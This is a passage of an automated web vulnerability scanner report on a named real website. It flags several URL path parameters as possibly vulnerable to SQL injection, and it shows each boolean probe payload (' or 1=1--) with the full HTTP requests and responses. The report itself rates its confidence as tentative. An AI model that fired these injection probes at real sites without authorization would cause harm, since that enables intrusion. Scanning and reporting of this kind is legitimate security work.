* @version        $Id: caption.js 5263 2006-10-02 01:25:24Z webImagery $
* @copyright    Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license        GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

/**
* JCaption javascript behavior
*
* Used for displaying image captions
*
* @package    Joomla
* @since    1.5
* @version    1.0
*/
var JCaption = new Class({
   initialize: function(selector)
   {
       this.selector = selector;

       var images = $$(selector);
       images.each(function(image){ this.createCaption(image); }, this);
   },

   createCaption: function(element)
   {
       var caption = document.createTextNode(element.title);
       var container = document.createElement("div");
       var text = document.createElement("p");
       var width = element.getAttribute("width");
       var align = element.getAttribute("align");

       if(!width) {
           width = element.width;
       }

       //Windows fix
       if (!align)
           align = element.getStyle("float"); // Rest of the world fix
       if (!align) // IE DOM Fix
           align = element.style.styleFloat;

       if (align=="") {
           align="none";
       }

       text.appendChild(caption);
       text.className = this.selector.replace('.', '_');

       element.parentNode.insertBefore(container, element);
       container.appendChild(element);
       if ( element.title != "" ) {
           container.a
...[SNIP]...

1.14. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 17976969'%20or%201%3d1--%20 and 17976969'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules17976969'%20or%201%3d1--%20/mod_fpss/includes/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:02:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules17976969' or 1=1-- /mod_fpss/includes/engines/jquery-fpss-comp.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules17976969'%20or%201%3d2--%20/mod_fpss/includes/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:02:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 586

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /modules17976969' or 1=2-- /mod_fpss/includes/engines/jquery-fpss-comp.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.15. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 20625992'%20or%201%3d1--%20 and 20625992'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpss20625992'%20or%201%3d1--%20/includes/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:04:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules/mod_fpss20625992' or 1=1-- /includes/engines/jquery-fpss-comp.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules/mod_fpss20625992'%20or%201%3d2--%20/includes/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:04:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 586

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /modules/mod_fpss20625992' or 1=2-- /includes/engines/jquery-fpss-comp.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.16. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13584805'%20or%201%3d1--%20 and 13584805'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpss/includes13584805'%20or%201%3d1--%20/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:06:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules/mod_fpss/includes13584805' or 1=1-- /engines/jquery-fpss-comp.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules/mod_fpss/includes13584805'%20or%201%3d2--%20/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:06:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 586

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /modules/mod_fpss/includes13584805' or 1=2-- /engines/jquery-fpss-comp.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.17. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 88843927'%20or%201%3d1--%20 and 88843927'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpss/includes/engines88843927'%20or%201%3d1--%20/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:07:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules/mod_fpss/includes/engines88843927' or 1=1-- /jquery-fpss-comp.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules/mod_fpss/includes/engines88843927'%20or%201%3d2--%20/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:08:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 586

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /modules/mod_fpss/includes/engines88843927' or 1=2-- /jquery-fpss-comp.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.18. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads 79937187'%20or%201%3d1--%20 and 79937187'%20or%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpss/includes/engines/jquery-fpss-comp.js79937187'%20or%201%3d1--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:08:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules/mod_fpss/includes/engines/jquery-fpss-comp.js79937187' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules/mod_fpss/includes/engines/jquery-fpss-comp.js79937187'%20or%201%3d2--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:08:49 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 586

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /modules/mod_fpss/includes/engines/jquery-fpss-comp.js79937187' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.19. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11806235%20or%201%3d1--%20 and 11806235%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpss/includes/engines/jquery-fpss-comp.js?111806235%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 03:09:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules/mod_fpss/includes/engines/jquery-fpss-comp.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules/mod_fpss/includes/engines/jquery-fpss-comp.js?111806235%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:09:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Fri, 07 Jan 2011 06:45:38 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 03:09:27 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 2793

/**
* @version        2.8
* @package        Frontpage Slideshow
* @author JoomlaWorks - http://www.joomlaworks.gr
* @copyright    Copyright (c) 2006 - 2011 JoomlaWorks, a business unit of Nuevvo Webware Ltd. All rights reserved.
* @license        Commercial - This code cannot be redistributed without permission from Nuevvo Webware Ltd.
*/

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2 6=1C.1v();2 P=1c;2 g=F;2 Z=F;2 U=\'Q\';2 N=u;2 x="1B";2 H="1x";2 D="1u";2 X="B-1m";2 17="B-1f";2 M="B";2 h="1b";2 s="-19";2 J="1A-1z";2 3=0;2 r=f;2 q=f;2 n;2 w;2 4;2 8;7 S(){V(X,17);n=m.A(J);5(N){G()}j{I()}4=6("L").O("."+M);8=6("L").O("."+h);5(4.9==0||8.9==0)k f;z(2 i=0;i<4.9;i++){5(U==\'Q\'){8[i].1a=7(){C(K)}}j{8[i].18=7(){C(K)}}5(i!=0){6(4[i]).t(g)}j{8[i].l=h+s}}}7 V(a,b){2 c=m.A(a);2 d=m.A(b);5(c||d){6(c).1y();6(d).15();14(7(){6(c).15();6(d).p("1w")},Z)}j{k f}}7 C(a){o=13;z(2 i=0;i<8.9;i++){5(a==8[i]){o=i}}5(o!=3){5(4[3].E){6(4[3]).t(g)}6(4[o]).p(g);8[3].l=h;8[o].l=h+s;3=o;12()}k f}7 I(){y(D,"f");n.11=x;n.R=x;q=u;10(w);r=f}7 G(){y(D,"u");n.11=H;n.R=H;q=f;v()}7 1t(){5(q){G()}j{I()}}7 Y(){5(4.9<=1)k f;5(4[3].E){6(4[3]).t(g)}8[3].l=h;5(3==4.9-1){3=0;6(4[3]).p(g)}j{6(4[++3]).p(g)}8[3].l=h+s}7 1s(){5(4.9<=1)k f;5(4[3].E){6(4[3]).t(g)}8[3].l=h;5(3==0){3=4.9-1;6(4[3]).p(g)}j{6(4[--3]).p(g)}8[3].l=h+s}7 v(){5(!q){w=14
...[SNIP]...

1.20. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/layout.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10350403'%20or%201%3d1--%20 and 10350403'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates10350403'%20or%201%3d1--%20/kontent11/css/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:02:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates10350403' or 1=1-- /kontent11/css/layout.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates10350403'%20or%201%3d2--%20/kontent11/css/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

